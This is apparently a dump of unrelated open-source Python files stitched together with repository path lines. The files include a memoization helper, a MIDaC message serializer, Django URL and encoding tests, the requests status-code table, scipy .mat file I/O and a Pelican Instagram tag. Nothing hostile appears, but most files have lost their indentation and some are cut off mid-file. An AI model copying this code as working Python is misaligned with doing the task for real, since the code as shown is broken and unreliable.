self._func = func
def __missing__(self, key):
value = self._func(key)
self[key] = value
return value
def fast_memoize_single_arg(func):
return cdict(func).__getitem__
class cdict2(dict):
def __init__(self, func):
dict.__init__(self)
self._func = func
def __missing__(self, key):
value = self._func(*key)
self[key] = value
return value
def fast_memoize_multiple_args(func):
f = cdict2(func).__getitem__
return lambda *args: f(args)
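# Illustrative usage sketch (not part of the original module). The functions
# `square` and `sqrt_of_square` below are hypothetical and only demonstrate how
# memoize_with_backing fills an LRUDict-backed cache, including the entry it
# records for a declared inverse function.
if __name__ == '__main__':
    cache = LRUDict(100)  # bounded LRU cache used as the backing store

    def sqrt_of_square(x):
        # never called here; it only serves as the cache key for the inverse entry
        raise AssertionError('expected to be answered from the cache')

    @memoize_with_backing(cache, has_inverses=set([sqrt_of_square]))
    def square(x):
        return x * x

    square(3)  # computes 9 and also stores (sqrt_of_square, (9,)) -> 3
    print cache.get((sqrt_of_square, (9,)))   # -> 3, filled in via has_inverses
    print memoize(lambda a, b: a + b)(1, 2)   # plain dict-backed memoization -> 3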
|
enitihas/SAC-Website
|
refs/heads/master
|
venv/lib/python2.7/site-packages/pip/_vendor/requests/packages/chardet/constants.py
|
3007
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
_debug = 0
eDetecting = 0
eFoundIt = 1
eNotMe = 2
eStart = 0
eError = 1
eItsMe = 2
SHORTCUT_THRESHOLD = 0.95
|
mvaled/sentry
|
refs/heads/master
|
src/sentry/mediators/service_hooks/__init__.py
|
3
|
from __future__ import absolute_import
from .creator import Creator # NOQA
from .updater import Updater # NOQA
from .destroyer import Destroyer # NOQA
|
team-items/MissionControl-Server
|
refs/heads/master
|
lib/MIDaCSerializer.py
|
1
|
import json
#ENUM style class for easier comparison
class MSGType():
ConnREQ = 1
ConnACK = 2
ConnREJ = 3
ConnLAO = 4
ConnSTT = 5
ConnB = 6
#exception thrown when a message is not MIDaC serializable
class MIDaCSerializationException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return "MIDaC Serialization Exception for "+repr(self.value)
#Class used to create, compare and serialize MIDaC messages
class MIDaCSerializer():
    def GetMessageType(self, msg):
        if type(msg) is str:
            # parse JSON strings so the membership checks below run on a dict
            msg = json.loads(msg)
        if type(msg) is dict:
if "ConnLAO" in msg:
return MSGType.ConnLAO
if "ConnACK" in msg:
return MSGType.ConnACK
if "ConnREQ" in msg:
return MSGType.ConnREQ
if "ConnREJ" in msg:
return MSGType.ConnREJ
if "ConnSTT" in msg:
return MSGType.ConnSTT
if "B-Connect" in msg:
return MSGType.ConnB
else:
raise MIDaCSerializationException(msg)
def GenerateConnACK(self, crypto, size):
ConnACK = {"ConnACK" : {"ChosenCrypto" : crypto, "SegmentSize" : size}}
resultString = json.dumps(ConnACK)
return resultString+"\n"
def GenerateConnACK_B(self):
ConnACK = { "ConnACK" : ""}
return json.dumps(ConnACK)
def GenerateConnLAO(self, integers, floats, bools, strings, sliders, buttons):
ConnLAO = {"ConnLAO" : {
"Information" : {
"Integer" : integers,
"Float" : floats,
"Bool" : bools,
"String" : strings
},
"Control" : {
"Slider" : sliders,
"Button" : buttons
}
}
}
return json.dumps(ConnLAO)
    def GenerateConnREJ(self, message):
        ConnREJ = {"ConnREJ" : {"Error" : message}}
        return json.dumps(ConnREJ)
def GenerateIntegerLAO(self, name, minbound, maxbound, graph):
if graph is None:
IntLAO = {name : {
"DataType" : "Integer",
"MinBound" : minbound,
"MaxBound" : maxbound,
}
}
return IntLAO
else:
IntLAO = {name : {
"DataType" : "Integer",
"MinBound" : minbound,
"MaxBound" : maxbound,
"Graph" : graph
}
}
return IntLAO
def GenerateFloatLAO(self, name, minbound, maxbound, graph):
if graph is None:
FloatLAO = {name : {
"DataType" : "Float",
"MinBound" : minbound,
"MaxBound" : maxbound,
}
}
return FloatLAO
else:
FloatLAO = {name : {
"DataType" : "Float",
"MinBound" : minbound,
"MaxBound" : maxbound,
"Graph" : graph
}
}
return FloatLAO
def GenerateStringLAO(self, name, minlength, maxlength):
StringLAO = {name : {
"DataType" : "String",
"MinLength" : minlength,
"MaxBound" : maxlength,
}
}
return StringLAO
def GenerateBoolLAO(self, name):
BoolLAO = {name : {
"DataType" : "Bool"
}
}
return BoolLAO
def GenerateSliderLAO(self, name, maxbound, minbound):
SliderLAO = {name : {
"ControlType" : "Slider",
"MinBound" : minbound,
"MaxBound" : maxbound
}
}
return SliderLAO
def GenerateButtonLAO(self, name):
ButtonLAO = {name : {
"ControlType" : "Button"
}
}
return ButtonLAO
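# Illustrative usage sketch (not part of the original module); the crypto name,
# segment size and control names below are made-up example values.
if __name__ == "__main__":
    serializer = MIDaCSerializer()
    ack = serializer.GenerateConnACK("AES", 1024)   # JSON string terminated by "\n"
    print(serializer.GetMessageType(ack) == MSGType.ConnACK)
    throttle = serializer.GenerateSliderLAO("throttle", maxbound=100, minbound=0)
    lao = serializer.GenerateConnLAO(integers=[], floats=[], bools=[], strings=[],
                                     sliders=[throttle], buttons=[])
    print(serializer.GetMessageType(lao) == MSGType.ConnLAO)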
|
mrquim/mrquimrepo
|
refs/heads/master
|
repo/script.module.youtube.dl/lib/youtube_dl/__main__.py
|
90
|
#!/usr/bin/env python
from __future__ import unicode_literals
# Execute with
# $ python youtube_dl/__main__.py (2.6+)
# $ python -m youtube_dl (2.7+)
import sys
if __package__ is None and not hasattr(sys, 'frozen'):
# direct call of __main__.py
import os.path
path = os.path.realpath(os.path.abspath(__file__))
sys.path.insert(0, os.path.dirname(os.path.dirname(path)))
import youtube_dl
if __name__ == '__main__':
youtube_dl.main()
|
clsdaniel/iridium
|
refs/heads/master
|
scm/urls.py
|
1
|
# Copyright (c) 2009, Carlos Daniel Ruvalcaba Valenzuela
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the Blackchair Software nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT
# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from django.conf.urls.defaults import *
urlpatterns = patterns('',
(r'(?P<pid>[\d\w]*)/(?P<rid>[\d\w]*)/diff/(?P<cid>[\d\w]*)', 'iridium.scm.views.viewDiff'),
(r'(?P<pid>[\d\w]*)/(?P<rid>[\d\w]*)/t/(?P<tree>[\d\w/]*)', 'iridium.scm.views.viewTree'),
(r'(?P<pid>[\d\w]*)/(?P<rid>[\d\w]*)/cat/(?P<tree>[\d\w/\.]*)', 'iridium.scm.views.viewFile'),
(r'(?P<pid>[\d\w]*)/(?P<rid>[\d\w]*)/t', 'iridium.scm.views.viewTree'),
(r'(?P<pid>[\d\w]*)/(?P<rid>[\d\w]*)', 'iridium.scm.views.viewRepo'),
(r'(?P<pid>[\d\w]*)', 'iridium.scm.views.listRepos'),
)
|
nirmeshk/mase
|
refs/heads/master
|
python101/code/Time2_soln.py
|
14
|
"""
Code example from Think Python, by Allen B. Downey.
Available from http://thinkpython.com
Copyright 2012 Allen B. Downey.
Distributed under the GNU General Public License at gnu.org/licenses/gpl.html.
"""
class Time(object):
"""Represents the time of day.
attributes: hour, minute, second
"""
def __init__(self, hour=0, minute=0, second=0):
minutes = hour * 60 + minute
self.seconds = minutes * 60 + second
def __str__(self):
minutes, second = divmod(self.seconds, 60)
hour, minute = divmod(minutes, 60)
return '%.2d:%.2d:%.2d' % (hour, minute, second)
def print_time(self):
print str(self)
def time_to_int(self):
"""Computes the number of seconds since midnight."""
return self.seconds
def is_after(self, other):
"""Returns True if t1 is after t2; false otherwise."""
return self.seconds > other.seconds
def __add__(self, other):
"""Adds two Time objects or a Time object and a number.
other: Time object or number of seconds
"""
if isinstance(other, Time):
return self.add_time(other)
else:
return self.increment(other)
def __radd__(self, other):
"""Adds two Time objects or a Time object and a number."""
return self.__add__(other)
def add_time(self, other):
"""Adds two time objects."""
assert self.is_valid() and other.is_valid()
seconds = self.seconds + other.seconds
return int_to_time(seconds)
def increment(self, seconds):
"""Returns a new Time that is the sum of this time and seconds."""
seconds += self.seconds
return int_to_time(seconds)
def is_valid(self):
"""Checks whether a Time object satisfies the invariants."""
return self.seconds >= 0 and self.seconds < 24*60*60
def int_to_time(seconds):
"""Makes a new Time object.
seconds: int seconds since midnight.
"""
return Time(0, 0, seconds)
def main():
start = Time(9, 45, 00)
start.print_time()
end = start.increment(1337)
end.print_time()
print 'Is end after start?',
print end.is_after(start)
print 'Using __str__'
print start, end
start = Time(9, 45)
duration = Time(1, 35)
print start + duration
print start + 1337
print 1337 + start
print 'Example of polymorphism'
t1 = Time(7, 43)
t2 = Time(7, 41)
t3 = Time(7, 37)
total = sum([t1, t2, t3])
print total
if __name__ == '__main__':
main()
|
hbarghi/VirtualBattery1
|
refs/heads/master
|
src/virtual-net-device/bindings/callbacks_list.py
|
127
|
callback_classes = [
['bool', 'ns3::Ptr<ns3::NetDevice>', 'ns3::Ptr<ns3::Packet const>', 'unsigned short', 'ns3::Address const&', 'ns3::Address const&', 'ns3::NetDevice::PacketType', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['bool', 'ns3::Ptr<ns3::NetDevice>', 'ns3::Ptr<ns3::Packet const>', 'unsigned short', 'ns3::Address const&', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['bool', 'ns3::Ptr<ns3::Packet>', 'ns3::Address const&', 'ns3::Address const&', 'unsigned short', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['void', 'ns3::Ptr<ns3::NetDevice>', 'ns3::Ptr<ns3::Packet const>', 'unsigned short', 'ns3::Address const&', 'ns3::Address const&', 'ns3::NetDevice::PacketType', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
]
|
PegasusWang/pyhome
|
refs/heads/master
|
crawler/sougou_wechat/_env.py
|
10
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import sys
from os.path import abspath, dirname, join
if sys.getdefaultencoding() != 'utf-8':
reload(sys)
sys.setdefaultencoding('utf-8')
PREFIX = abspath(join(dirname(abspath(__file__)), '../'))
PARENT = abspath(join(dirname(abspath(__file__)), '../../'))
if PREFIX not in sys.path:
sys.path.append(PREFIX)
sys.path.append(PARENT)
|
tayfun/django
|
refs/heads/master
|
tests/utils_tests/test_encoding.py
|
288
|
# -*- encoding: utf-8 -*-
from __future__ import unicode_literals
import datetime
import unittest
from django.utils import six
from django.utils.encoding import (
escape_uri_path, filepath_to_uri, force_bytes, force_text, iri_to_uri,
smart_text, uri_to_iri,
)
from django.utils.functional import SimpleLazyObject
from django.utils.http import urlquote_plus
class TestEncodingUtils(unittest.TestCase):
def test_force_text_exception(self):
"""
Check that broken __unicode__/__str__ actually raises an error.
"""
class MyString(object):
def __str__(self):
return b'\xc3\xb6\xc3\xa4\xc3\xbc'
__unicode__ = __str__
# str(s) raises a TypeError on python 3 if the result is not a text type.
# python 2 fails when it tries converting from str to unicode (via ASCII).
exception = TypeError if six.PY3 else UnicodeError
self.assertRaises(exception, force_text, MyString())
def test_force_text_lazy(self):
s = SimpleLazyObject(lambda: 'x')
self.assertTrue(issubclass(type(force_text(s)), six.text_type))
def test_force_bytes_exception(self):
"""
Test that force_bytes knows how to convert to bytes an exception
containing non-ASCII characters in its args.
"""
error_msg = "This is an exception, voilà"
exc = ValueError(error_msg)
result = force_bytes(exc)
self.assertEqual(result, error_msg.encode('utf-8'))
def test_force_bytes_strings_only(self):
today = datetime.date.today()
self.assertEqual(force_bytes(today, strings_only=True), today)
def test_smart_text(self):
class Test:
if six.PY3:
def __str__(self):
return 'ŠĐĆŽćžšđ'
else:
def __str__(self):
return 'ŠĐĆŽćžšđ'.encode('utf-8')
class TestU:
if six.PY3:
def __str__(self):
return 'ŠĐĆŽćžšđ'
def __bytes__(self):
return b'Foo'
else:
def __str__(self):
return b'Foo'
def __unicode__(self):
return '\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111'
self.assertEqual(smart_text(Test()), '\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111')
self.assertEqual(smart_text(TestU()), '\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111')
self.assertEqual(smart_text(1), '1')
self.assertEqual(smart_text('foo'), 'foo')
class TestRFC3987IEncodingUtils(unittest.TestCase):
def test_filepath_to_uri(self):
self.assertEqual(filepath_to_uri('upload\\чубака.mp4'),
'upload/%D1%87%D1%83%D0%B1%D0%B0%D0%BA%D0%B0.mp4')
self.assertEqual(filepath_to_uri('upload\\чубака.mp4'.encode('utf-8')),
'upload/%D1%87%D1%83%D0%B1%D0%B0%D0%BA%D0%B0.mp4')
def test_iri_to_uri(self):
cases = [
# Valid UTF-8 sequences are encoded.
('red%09rosé#red', 'red%09ros%C3%A9#red'),
('/blog/for/Jürgen Münster/', '/blog/for/J%C3%BCrgen%20M%C3%BCnster/'),
('locations/%s' % urlquote_plus('Paris & Orléans'), 'locations/Paris+%26+Orl%C3%A9ans'),
# Reserved chars remain unescaped.
('%&', '%&'),
('red&♥ros%#red', 'red&%E2%99%A5ros%#red'),
]
for iri, uri in cases:
self.assertEqual(iri_to_uri(iri), uri)
# Test idempotency.
self.assertEqual(iri_to_uri(iri_to_uri(iri)), uri)
def test_uri_to_iri(self):
cases = [
# Valid UTF-8 sequences are decoded.
('/%E2%99%A5%E2%99%A5/', '/♥♥/'),
('/%E2%99%A5%E2%99%A5/?utf8=%E2%9C%93', '/♥♥/?utf8=✓'),
# Broken UTF-8 sequences remain escaped.
('/%AAd%AAj%AAa%AAn%AAg%AAo%AA/', '/%AAd%AAj%AAa%AAn%AAg%AAo%AA/'),
('/%E2%99%A5%E2%E2%99%A5/', '/♥%E2♥/'),
('/%E2%99%A5%E2%99%E2%99%A5/', '/♥%E2%99♥/'),
('/%E2%E2%99%A5%E2%99%A5%99/', '/%E2♥♥%99/'),
('/%E2%99%A5%E2%99%A5/?utf8=%9C%93%E2%9C%93%9C%93', '/♥♥/?utf8=%9C%93✓%9C%93'),
]
for uri, iri in cases:
self.assertEqual(uri_to_iri(uri), iri)
# Test idempotency.
self.assertEqual(uri_to_iri(uri_to_iri(uri)), iri)
def test_complementarity(self):
cases = [
('/blog/for/J%C3%BCrgen%20M%C3%BCnster/', '/blog/for/J\xfcrgen M\xfcnster/'),
('%&', '%&'),
('red&%E2%99%A5ros%#red', 'red&♥ros%#red'),
('/%E2%99%A5%E2%99%A5/', '/♥♥/'),
('/%E2%99%A5%E2%99%A5/?utf8=%E2%9C%93', '/♥♥/?utf8=✓'),
('/%AAd%AAj%AAa%AAn%AAg%AAo%AA/', '/%AAd%AAj%AAa%AAn%AAg%AAo%AA/'),
('/%E2%99%A5%E2%E2%99%A5/', '/♥%E2♥/'),
('/%E2%99%A5%E2%99%E2%99%A5/', '/♥%E2%99♥/'),
('/%E2%E2%99%A5%E2%99%A5%99/', '/%E2♥♥%99/'),
('/%E2%99%A5%E2%99%A5/?utf8=%9C%93%E2%9C%93%9C%93', '/♥♥/?utf8=%9C%93✓%9C%93'),
]
for uri, iri in cases:
self.assertEqual(iri_to_uri(uri_to_iri(uri)), uri)
self.assertEqual(uri_to_iri(iri_to_uri(iri)), iri)
def test_escape_uri_path(self):
self.assertEqual(
escape_uri_path('/;some/=awful/?path/:with/@lots/&of/+awful/chars'),
'/%3Bsome/%3Dawful/%3Fpath/:with/@lots/&of/+awful/chars'
)
self.assertEqual(escape_uri_path('/foo#bar'), '/foo%23bar')
self.assertEqual(escape_uri_path('/foo?bar'), '/foo%3Fbar')
|
JeyZeta/Dangerous
|
refs/heads/master
|
Dangerous/TheHarvester/requests-2.9.1/requests/status_codes.py
|
202
|
# -*- coding: utf-8 -*-
from .structures import LookupDict
_codes = {
# Informational.
100: ('continue',),
101: ('switching_protocols',),
102: ('processing',),
103: ('checkpoint',),
122: ('uri_too_long', 'request_uri_too_long'),
200: ('ok', 'okay', 'all_ok', 'all_okay', 'all_good', '\\o/', '✓'),
201: ('created',),
202: ('accepted',),
203: ('non_authoritative_info', 'non_authoritative_information'),
204: ('no_content',),
205: ('reset_content', 'reset'),
206: ('partial_content', 'partial'),
207: ('multi_status', 'multiple_status', 'multi_stati', 'multiple_stati'),
208: ('already_reported',),
226: ('im_used',),
# Redirection.
300: ('multiple_choices',),
301: ('moved_permanently', 'moved', '\\o-'),
302: ('found',),
303: ('see_other', 'other'),
304: ('not_modified',),
305: ('use_proxy',),
306: ('switch_proxy',),
307: ('temporary_redirect', 'temporary_moved', 'temporary'),
308: ('permanent_redirect',
'resume_incomplete', 'resume',), # These 2 to be removed in 3.0
# Client Error.
400: ('bad_request', 'bad'),
401: ('unauthorized',),
402: ('payment_required', 'payment'),
403: ('forbidden',),
404: ('not_found', '-o-'),
405: ('method_not_allowed', 'not_allowed'),
406: ('not_acceptable',),
407: ('proxy_authentication_required', 'proxy_auth', 'proxy_authentication'),
408: ('request_timeout', 'timeout'),
409: ('conflict',),
410: ('gone',),
411: ('length_required',),
412: ('precondition_failed', 'precondition'),
413: ('request_entity_too_large',),
414: ('request_uri_too_large',),
415: ('unsupported_media_type', 'unsupported_media', 'media_type'),
416: ('requested_range_not_satisfiable', 'requested_range', 'range_not_satisfiable'),
417: ('expectation_failed',),
418: ('im_a_teapot', 'teapot', 'i_am_a_teapot'),
422: ('unprocessable_entity', 'unprocessable'),
423: ('locked',),
424: ('failed_dependency', 'dependency'),
425: ('unordered_collection', 'unordered'),
426: ('upgrade_required', 'upgrade'),
428: ('precondition_required', 'precondition'),
429: ('too_many_requests', 'too_many'),
431: ('header_fields_too_large', 'fields_too_large'),
444: ('no_response', 'none'),
449: ('retry_with', 'retry'),
450: ('blocked_by_windows_parental_controls', 'parental_controls'),
451: ('unavailable_for_legal_reasons', 'legal_reasons'),
499: ('client_closed_request',),
# Server Error.
500: ('internal_server_error', 'server_error', '/o\\', '✗'),
501: ('not_implemented',),
502: ('bad_gateway',),
503: ('service_unavailable', 'unavailable'),
504: ('gateway_timeout',),
505: ('http_version_not_supported', 'http_version'),
506: ('variant_also_negotiates',),
507: ('insufficient_storage',),
509: ('bandwidth_limit_exceeded', 'bandwidth'),
510: ('not_extended',),
511: ('network_authentication_required', 'network_auth', 'network_authentication'),
}
codes = LookupDict(name='status_codes')
for code, titles in _codes.items():
for title in titles:
setattr(codes, title, code)
if not title.startswith('\\'):
setattr(codes, title.upper(), code)
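# Illustrative usage sketch (not part of the original module): once the loop
# above has populated the LookupDict, every alias resolves to its numeric code.
if __name__ == '__main__':
    assert codes.ok == codes.OK == 200
    assert codes.not_found == 404 and codes.teapot == 418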
|
scipy/scipy-svn
|
refs/heads/master
|
scipy/io/matlab/mio.py
|
4
|
"""Module for reading and writing MATLAB .mat files"""
# Authors: Travis Oliphant, Matthew Brett
"""
Module for reading and writing matlab (TM) .mat files
"""
import os
import sys
import warnings
from numpy.compat import asbytes
from miobase import get_matfile_version, docfiller
from mio4 import MatFile4Reader, MatFile4Writer
from mio5 import MatFile5Reader, MatFile5Writer
__all__ = ['find_mat_file', 'mat_reader_factory', 'loadmat', 'savemat']
@docfiller
def find_mat_file(file_name, appendmat=True):
''' Try to find .mat file on system path
Parameters
----------
file_name : str
file name for mat file
%(append_arg)s
Returns
-------
full_name : string
possibly modified name after path search
'''
warnings.warn('Searching for mat files on python system path will be ' +
'removed in next version of scipy',
DeprecationWarning, stacklevel=2)
if appendmat and file_name.endswith(".mat"):
file_name = file_name[:-4]
if os.sep in file_name:
full_name = file_name
if appendmat:
full_name = file_name + ".mat"
else:
full_name = None
junk, file_name = os.path.split(file_name)
for path in [os.curdir] + list(sys.path):
test_name = os.path.join(path, file_name)
if appendmat:
test_name += ".mat"
try:
fid = open(test_name,'rb')
fid.close()
full_name = test_name
break
except IOError:
pass
return full_name
def _open_file(file_like, appendmat):
''' Open `file_like` and return as file-like object '''
if isinstance(file_like, basestring):
try:
return open(file_like, 'rb')
except IOError:
pass
if appendmat and not file_like.endswith('.mat'):
try:
return open(file_like + '.mat', 'rb')
except IOError:
pass
# search the python path - we'll remove this soon
full_name = find_mat_file(file_like, appendmat)
if full_name is None:
raise IOError("%s not found on the path."
% file_like)
return open(full_name, 'rb')
# not a string - maybe file-like object
try:
file_like.read(0)
except AttributeError:
raise IOError('Reader needs file name or open file-like object')
return file_like
@docfiller
def mat_reader_factory(file_name, appendmat=True, **kwargs):
"""Create reader for matlab .mat format files
Parameters
----------
%(file_arg)s
%(append_arg)s
%(load_args)s
%(struct_arg)s
Returns
-------
matreader : MatFileReader object
Initialized instance of MatFileReader class matching the mat file
type detected in `filename`.
"""
byte_stream = _open_file(file_name, appendmat)
mjv, mnv = get_matfile_version(byte_stream)
if mjv == 0:
return MatFile4Reader(byte_stream, **kwargs)
elif mjv == 1:
return MatFile5Reader(byte_stream, **kwargs)
elif mjv == 2:
raise NotImplementedError('Please use HDF reader for matlab v7.3 files')
else:
raise TypeError('Did not recognize version %s' % mjv)
@docfiller
def loadmat(file_name, mdict=None, appendmat=True, **kwargs):
"""
Load MATLAB file
Parameters
----------
%(file_arg)s
m_dict : dict, optional
Dictionary in which to insert matfile variables.
%(append_arg)s
%(load_args)s
%(struct_arg)s
variable_names : None or sequence
If None (the default) - read all variables in file. Otherwise
`variable_names` should be a sequence of strings, giving names of the
matlab variables to read from the file. The reader will skip any
variable with a name not in this sequence, possibly saving some read
processing.
Returns
-------
mat_dict : dict
dictionary with variable names as keys, and loaded matrices as
values
Notes
-----
v4 (Level 1.0), v6 and v7 to 7.2 matfiles are supported.
You will need an HDF5 python library to read matlab 7.3 format mat
files. Because scipy does not supply one, we do not implement the
HDF5 / 7.3 interface here.
"""
variable_names = kwargs.pop('variable_names', None)
MR = mat_reader_factory(file_name, appendmat, **kwargs)
matfile_dict = MR.get_variables(variable_names)
if mdict is not None:
mdict.update(matfile_dict)
else:
mdict = matfile_dict
if isinstance(file_name, basestring):
MR.mat_stream.close()
return mdict
@docfiller
def savemat(file_name, mdict,
appendmat=True,
format='5',
long_field_names=False,
do_compression=False,
oned_as=None):
"""
Save a dictionary of names and arrays into a MATLAB-style .mat file.
This saves the array objects in the given dictionary to a MATLAB-
style .mat file.
Parameters
----------
file_name : str or file-like object
Name of the .mat file (.mat extension not needed if ``appendmat ==
True``).
Can also pass open file_like object.
    mdict : dict
        Dictionary from which to save matfile variables.
%(append_arg)s
format : {'5', '4'}, string, optional
'5' (the default) for MATLAB 5 and up (to 7.2),
'4' for MATLAB 4 .mat files
%(long_fields)s
%(do_compression)s
%(oned_as)s
See also
--------
mio4.MatFile4Writer
mio5.MatFile5Writer
Notes
-----
If ``format == '4'``, `mio4.MatFile4Writer` is called, which sets
`oned_as` to 'row' if it had been None. If ``format == '5'``,
`mio5.MatFile5Writer` is called, which sets `oned_as` to 'column' if
it had been None, but first it executes:
``warnings.warn("Using oned_as default value ('column')" +``
``" This will change to 'row' in future versions",``
``FutureWarning, stacklevel=2)``
without being more specific as to precisely when the change will take
place.
"""
file_is_string = isinstance(file_name, basestring)
if file_is_string:
if appendmat and file_name[-4:] != ".mat":
file_name = file_name + ".mat"
file_stream = open(file_name, 'wb')
else:
try:
file_name.write(asbytes(''))
except AttributeError:
raise IOError('Writer needs file name or writeable '
'file-like object')
file_stream = file_name
if format == '4':
if long_field_names:
raise ValueError("Long field names are not available for version 4 files")
MW = MatFile4Writer(file_stream, oned_as)
elif format == '5':
MW = MatFile5Writer(file_stream,
do_compression=do_compression,
unicode_strings=True,
long_field_names=long_field_names,
oned_as=oned_as)
else:
raise ValueError("Format should be '4' or '5'")
MW.put_variables(mdict)
if file_is_string:
file_stream.close()
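# Illustrative round trip (a doctest-style sketch; the temporary file name and
# the numpy import are assumptions, not part of this module):
#
# >>> import numpy as np
# >>> savemat('/tmp/example.mat', {'a': np.arange(4.0)}, oned_as='row')
# >>> loadmat('/tmp/example.mat')['a']
# array([[ 0.,  1.,  2.,  3.]])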
|
olgabrani/synnefo
|
refs/heads/feature-newui-pithos
|
snf-pithos-backend/pithos/__init__.py
|
70
|
# Copyright (C) 2010-2014 GRNET S.A.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# this is a namespace package
try:
import pkg_resources
pkg_resources.declare_namespace(__name__)
except ImportError:
import pkgutil
__path__ = pkgutil.extend_path(__path__, __name__)
|
40423143/2017springcd_hw
|
refs/heads/gh-pages
|
plugin/liquid_tags/gram.py
|
271
|
"""
Instagram Image Tag
-------------------
By `Tom Spalding <https://github.com/digitalvapor>`_
You can see a working example at `antivapor.net/instagram-tag.html <http://antivapor.net/instagram-tag.html>`_.
Based on `Liquid Image Tag <https://github.com/getpelican/pelican-plugins/blob/master/liquid_tags/img.py>`_ by `Jake Vanderplas <https://github.com/jakevdp>`_.
Optional Todo:
* Query JSON to automatically include descriptions.
http://api.instagram.com/oembed?url=http://instagr.am/p/olw8jXiz1_/
and option to add wrapping anchor link to original http://instagram.com/p/olw8jXiz1_
* Default to size m
http://instagr.am/p/olw8jXiz1_/media/?size=t
http://instagr.am/p/olw8jXiz1_/media
* Provide examples of use with [Better Figures and Images](https://github.com/getpelican/pelican-plugins/tree/master/better_figures_and_images).
Syntax
------
{% gram shortcode [size] [width] [class name(s)] [title text | "title text" ["alt text"]] %}
where size is t, m, or l, and it defaults to m. see http://instagram.com/developer/embedding.
Examples
--------
{% gram pFG7naIZkr t %}
{% gram pFJE11IZnx %}
{% gram pFI0CAIZna l 400 figure 'pretty turkey tail fungus' %}
{% gram rOru21oZpe l 450 test_class instagram 'warehouse window title' 'alt text' %}
Output
------
<img src="http://photos-c.ak.instagram.com/hphotos-ak-xaf1/t51.2885-15/917172_604907902963826_254280879_n.jpg" width="450" title="warehouse window title" alt="alt text" class="test_class instagram">
"""
import re
try:
from urllib.request import urlopen
except ImportError:
from urllib import urlopen
from .mdx_liquid_tags import LiquidTags
SYNTAX = '{% gram shortcode [size] [width] [class name(s)] [title text | "title text" ["alt text"]] %}'
# Regular expression for full syntax
# ReGram = re.compile("""(?P<shortcode>\S+)(?:\s+(?P<size>[tml]?))?(?:\s+(?P<width>\d*))?(?:\s+(?P<class>\S*))?(?P<title>\s+.+)?""")
ReGram = re.compile("""(?P<shortcode>\S+)(?:\s+(?P<size>[tml]?))?(?:\s+(?P<width>\d*))?(?:\s+(?P<class>[^']*))?(?P<title>.+)?""")
# Regular expression to split the title and alt text
ReTitleAlt = re.compile("""(?:"|')(?P<title>[^"']+)?(?:"|')\s+(?:"|')(?P<alt>[^"']+)?(?:"|')""")
@LiquidTags.register('gram')
def gram(preprocessor, tag, markup):
attrs = None
# Parse the markup string
match = ReGram.search(markup)
if match:
attrs = dict([(key, val.strip())
for (key, val) in match.groupdict().items() if val])
else:
raise ValueError('Error processing input. '
'Expected syntax: {0}'.format(SYNTAX))
# Construct URI
#print(attrs)
shortcode = attrs['shortcode']
url = 'http://instagr.am/p/'+shortcode+'/media/'
del attrs['shortcode']
if 'size' in attrs:
size = '?size={0}'.format(attrs['size'])
url = url+size
del attrs['size']
r = urlopen(url)
if(r.getcode()==404):
        raise ValueError("%s isn't a photo." % shortcode)
gram_url = r.geturl()
# Check if alt text is present -- if so, split it from title
if 'title' in attrs:
match = ReTitleAlt.search(attrs['title'])
if match:
attrs.update(match.groupdict())
if not attrs.get('alt'):
attrs['alt'] = attrs['title']
#print('updated dict: '+repr(attrs))
# Return the formatted text
